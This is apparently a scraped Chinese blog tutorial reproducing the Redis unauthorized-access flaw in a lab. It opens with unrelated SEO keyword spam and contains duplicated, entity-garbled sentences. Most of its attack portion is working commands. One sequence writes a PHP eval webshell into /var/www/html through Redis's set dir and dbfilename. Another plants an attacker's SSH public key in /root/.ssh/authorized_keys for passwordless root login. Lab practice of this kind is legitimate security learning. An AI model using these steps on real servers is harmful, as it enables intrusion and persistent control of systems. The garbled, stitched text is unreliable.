切实加强门户网站建设,成都建设高端网站,59网站一起做网店女鞋,石家庄免费网站建设什么是redis
redis就是个数据库#xff0c;跟mysql不同的地方在于redis主要将数据存在内存中#xff0c;读写速度非常快
redis未授权
其原因很简单#xff0c;就是redis服务器在默认安装好不配置的情况下可以直接免密码登录#xff0c;登录后在web目录写入一句话木马跟mysql不同的地方在于redis主要将数据存在内存中读写速度非常快
redis未授权
其原因很简单就是redis服务器在默认安装好不配置的情况下可以直接免密码登录登录后在web目录写入一句话木马或者写入ssh公钥实现免密码登录ssh
环境搭建 使用kali自带的redis但有一点需要注意kali中的redis默认开启了保护需要关闭 vim /etc/redis/redis.conf进入配置文件 将protected-mode设置成no win11做攻击机专门实现ssh免密码登录
复现步骤
redis免密登录写一句话木马 开启redis服务 测试一下成功免密登录 在网站根路径写入一句话木马 1、set dir /var/www/html 设置写入路径
2、set dbfilename 1.php 设置写入文件名
3、set webshell ?php eval($_POST[666])? 写入内容
4、save 保存kali自带的redis有bug命令输入显示ok但实际不生效建议在centos中安装 centos安装redis步骤 1、wget -O /etc/yum.repos.d/CentOS-Base.repo http://mirrors.aliyun.com/repo/Centos-7.repo 下载yum源
2、yum install -y http://rpms.famillecollet.com/enterprise/remi-release-7.rpm 丰富yum源软件包
3、yum -y install redis* 安装redis通过redis漏洞写入ssh公钥实现免密登录 开启kali中ssh服务systemctl start sshd 在win11安装Git用于伪造公私钥 安装好后右键选择git bash here 进入bash解释器 输入ssh-keygen -t rsa指定算法在当前用户家目录下生成密钥 将生成的公钥复制通过redis写入kali的.ssh文件中即可实现免密登录 写入步骤 1、set dir /root/.ssh/
2、set dbfilename authorized_keys 文件名不能错
3、set margin 公钥
4、save尝试登录成功免密登录
